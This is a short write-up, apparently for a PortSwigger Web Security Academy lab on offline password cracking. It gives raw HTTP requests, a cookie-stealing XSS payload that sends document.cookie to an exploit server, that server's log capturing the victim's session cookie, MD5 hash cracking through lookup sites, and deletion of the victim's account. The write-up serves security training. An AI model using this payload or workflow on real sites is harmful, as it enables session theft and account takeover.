Port Swigger Offline password cracking

Offline password cracking

Solution

Login to website as user: wiener

L: wiener
P: peter

Password is cookie stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw

---
POST /login HTTP/2
Host: 0a07008a03a3d9308047993700a5001d.web-security-academy.net
Cookie: session=S0F4JEYb8PztslLuxQoEo0bZz43W20O0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net
Referer: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter&stay-logged-in=on
---
GET /my-account?id=wiener HTTP/2
Host: 0a07008a03a3d9308047993700a5001d.web-security-academy.net
Cookie: session=vS01EdIJ79CXa1lESH74qYkjnTzPcVBO; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Decode cookie

Cookie --> d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
Decoded cookie --> wiener:51dc30ddc473d43a6011e9ebba6ca770
MD5 reverse: 51dc30ddc473d43a6011e9ebba6ca770 --> peter
https://hackerdna.com/tools/md5/51dc30ddc473d43a6011e9ebba6ca770

XSS read cookie for user: carlos

Payload: <script>document.location='https://exploit-0ac200840356139181bcb0a3018f0095.exploit-server.net/exploit/'+document.cookie</script>
---
Open the website: https://exploit-0ac200840356139181bcb0a3018f0095.exploit-server.net/log

93.157.114.80   2025-09-19 11:33:03 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:33:03 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
10.0.3.19       2025-09-19 11:34:23 +0000 "GET /exploit/secret=2teEjyjISQrDTHdNgD1gsFZMpt4pQYPV;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.157.114.80   2025-09-19 11:34:30 +0000 "GET /exploit/ HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:39 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:44 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

Decode cookie for user carlos

Cookie --> Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
Decode cookie --> carlos:26323c16d5f4dabff3bb136f2460a943
MD5 reverse: 26323c16d5f4dabff3bb136f2460a943 --> onceuponatime
https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943

Login to website and delete accout

POST /login HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=wnFbgp7gYJZP2kohWMLHZeolYJs3VDg4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=carlos&password=onceuponatime
---
GET /my-account?id=carlos HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account?id=carlos
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account?id=carlos
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account/delete
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

password=onceuponatime

Solved